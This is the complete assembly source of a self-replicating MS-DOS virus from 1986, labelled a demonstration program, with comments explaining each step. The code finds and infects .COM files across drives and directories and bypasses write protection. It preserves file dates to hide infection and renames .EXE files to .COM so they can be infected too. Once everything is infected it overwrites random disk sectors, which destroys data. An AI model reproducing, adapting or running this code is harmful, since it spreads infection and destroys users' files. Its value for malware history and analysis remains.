page 70,120 Name VIRUS ;************************************************************************* ; Program Virus Ver.: 1.1 ; Copyright by R. Burger 1986 ; This is a demonstration program for computer ; viruses. It has the ability to replicate itself, ; and thereby modify other programs ;************************************************************************* Code Segment Assume CS:Code progr equ 100h ORG progr ;************************************************************************* ; The three NOP's serve as the marker byte of the ; virus which will allow it to identify a virus ;************************************************************************* MAIN: nop nop nop ;************************************************************************* ; Initialize the pointers ;************************************************************************* mov ax,00 mov es:[pointer],ax mov es:[counter],ax mov es:[disks],al ;************************************************************************* ; Get the selected drive ;************************************************************************* mov ah,19h ; drive? int 21h ;************************************************************************* ; Get the current path on the current drive ;************************************************************************* mov cs:drive,al ; save drive mov ah,47h ; dir? mov dh,0 add al,1 mov dl,al ; in actual drive lea si,cs:old_path int 21h ;************************************************************************* ; Get the number of drives present. ; If only one drive is present, the pointer for ; search order will be set to search order + 6 ;************************************************************************* mov ah,0eh ; how many disks mov dl,0 ; int 21h mov al,01 cmp al,01 ; one drive? jnz hups3 mov al,06 hups3: mov ah,0 lea bx,search_order add bx,ax add bx,0001h mov cs:pointer,bx clc ;************************************************************************* ; Carry is set, if no more .COM's are found. ; Then, to avoid unnecessary work, .EXE files will ; be renamed to .COM file and infected. ; This causes the error message "Program too lrage ; to fit in memory" when starting larger infected ; EXE programs. ;************************************************************************* change_disk: jnc no_name_change mov ah,17h ; change exe to com lea dx,cs:maske_exe int 21h cmp al,0ffh jnz no_name_change ; .EXE found? ;************************************************************************* ; If neither .COM nor .EXE is found, then sectors will ; be overwritten depending on the system time in ; milliseconds. This is the time of the complete ; "infection" of a storage medium. The virus can find ; nothing more to infect and starts its destruction. ;************************************************************************* mov ah,2ch ; read system clock int 21h mov bx,cs:pointer mov al,cs:[bx] mov bx,dx mov cx,2 mov dh,0 int 26h ; write crap on disk ;************************************************************************* ; Check if the end of the search order table has been ; reached. If so, end. ;************************************************************************* no_name_change: mov bx,cs:pointer dec bx mov cs:pointer,bx mov dl,cs:[bx] cmp dl,0ffh jnz hups2 jmp hops ;************************************************************************* ; Get new drive from search order table and ; select it. ;************************************************************************* hups2: mov ah,0eh int 21h ; change disk ;************************************************************************* ; Start in the root directory ;************************************************************************* mov ah,3bh ; change path lea dx,path int 21h jmp find_first_file ;************************************************************************* ; Starting from the root, search for the first subdir ; First convert all .EXE files to .COM in the old ; directory. ;************************************************************************* find_first_subdir: mov ah,17h ; change exe to com lea dx,cs:maske_exe int 21h mov ah,3bh ; use root dir lea dx,path int 21h mov ah,04eh ;Search for first subdirectory mov cx,00010001b ; dir mask lea dx,maske_dir int 21h jc change_disk mov bx,CS:counter INC BX DEC bx jz use_next_subdir ;************************************************************************* ; Search for the next subdir. If no more directories ; are found, the drive will be changed. ;************************************************************************* find_next_subdir: mov ah,4fh ; search for next subdir int 21h jc change_disk dec bx jnz find_next_subdir ;************************************************************************* ; Select found directory ;************************************************************************* use_next_subdir: mov ah,2fh ; get dta address int 21h add bx,1ch mov es:[bx],'\ ' ; address of name in dta inc bx push ds mov ax,es mov ds,ax mov dx,bx mov ah,3bh ; change path int 21h pop ds mov bx,cs:counter inc bx mov CS:counter,bx ;************************************************************************* ; Find first .COM file in the current directory. ; If there are non, search the next directory. ;************************************************************************* find_first_file: mov ah,04eh ; Search for first mov cx,00000001b ; mask lea dx,maske_com ; int 21h jc find_first_subdir jmp check_if_ill ;************************************************************************* ; If the program is already infected, search for ; the next program. ;************************************************************************* find_next_file: mov ah,4fh ; search for next int 21h jc find_first_subdir ;************************************************************************* ; Check if already infected by the virus. ;************************************************************************* check_if_ill: mov ah,3dh ; open channel mov al,02h ; read/write mov dx,9eh ; address of name in dta int 21h mov bx,ax ; save channel mov ah,3fh ; read file mov cx,buflen ; mov dx,buffer ; write in buffer int 21h mov ah,3eh ; CLODE FILE int 21h ;************************************************************************* ; Here we search for three NOP's. ; If present, there is already an infection. We must ; then continue the search. ;************************************************************************* mov bx,cs:[buffer] cmp bx,9090h jz find_next_file ;************************************************************************* ; Bypass MS-DOS write protection if present ;************************************************************************* mov ah,43h ; write enable mov al,0 mov dx,9eh ; address of name in dta int 21h mov ah,43h mov al,01h and cx,11111110b int 21h ;************************************************************************* ; Open file for write access. ;************************************************************************* mov ah,3dh ; open channel mov al,02h ; read/write mov dx,9eh ; address of name in dta int 21h ;************************************************************************* ; Read date entry of program and save for future use. ;************************************************************************* mov bx,ax ; channel mov ah,57h ; get date mov al,0 int 21h push cx ; save date push dx ;************************************************************************* ; The jump located at address 0100h of the program ; will be saved for future use. ;************************************************************************* mov dx,cs:[conta] ; save old jmp mov cs:[jmpbuf],dx mov dx,cs:[buffer+1] ; save new jump lea cx,cont-100h sub dx,cx mov cs:[conta],dx ;************************************************************************* ; The virus copies itself to the start of the file ;************************************************************************* mov ah,40h ; write virus mov cx,buflen ; length buffer lea dx,main ; write virus int 21h ;************************************************************************* ; Enter the old creation date of the file. ;************************************************************************* mov ah,57h ; write date mov al,1 pop dx pop cx ; restore date int 21h ;************************************************************************* ; Close the file. ;************************************************************************* mov ah,3eh ; close file int 21h ;************************************************************************* ; restore the old jump address. ; The virus saves at address "conta' the jump which ; was at the start of the host program. ; This is done to preserve the executability of the ; host program as much as possible. ; After saving itstill works with the jump address ; contained in the virus. The jump address in the ; virus differs from the jump address in memory ; ;************************************************************************* mov dx,cs:[jmpbuf] ; restore old jmp mov cs:[conta],dx hops: nop call use_old ;************************************************************************* ; Continue with the host program. ;************************************************************************* cont db 0e9h ; make jump conta dw 0 mov ah,00 int 21h ;************************************************************************* ; reactivate the selected drive at the start of the ; program. ;************************************************************************* use_old: mov ah,0eh ; use old drive mov dl,cs:drive int 21h ;************************************************************************* ; Reactivate the selected path at the start of the ; program. ;************************************************************************* mov ah,3bh ; use old dir lea dx,old_path-1 ; get old path and backslash int 21h ret search_order db 0ffh,1,0,2,3,0ffh,00,0ffh pointer dw 0000 ; pointer f. search order counter dw 0000 ; counter f. nth search disks db 0 ; number of disks maske_com db "*.com",00 ; search for com files maske_dir db "*",00 ; search dir's maske_exe db 0ffh,0,0,0,0,0,00111111b db 0,"????????exe",0,0,0,0 db 0,"????????com",0 maske_all db 0ffh,0,0,0,0,0,00111111b db 0,"???????????",0,0,0,0 db 0,"????????com",0 buffer equ 0e000h ; a safe place buflen equ 230h ; length of virus !!!!!! ; careful ; if changing !!!!!! jmpbuf equ buffer+buflen ; a safe place for jump path db "\",0 ; first path drive db 0 ; actual drive back_slash db "\" old_path db 32 dup(?) ; old path code ends end main ;************************************************************************* ; WHAT THE PROGRAM DOES: ; ; When the program is started, the first COM file in the root ; directory is infected. You can't see any changes to the ; directory entries. But if you look at the hex dump of an ; infected program, you can see the marker, which in this case ; consists of three NOP's (hex 90). WHen the infected program ; is started, the virus will first replicate itself, and then ; try to run the host program. It may run or it may not, but ; it will infect another program. This continues until all ; the COM files are infected. The next time it is run, all ; of the EXE files are changed to COM files so that they can ; be infected. In addition, the manipulation task of the virus ; begins, which consists of the random destruction of disk ; sectors. ;*************************************************************************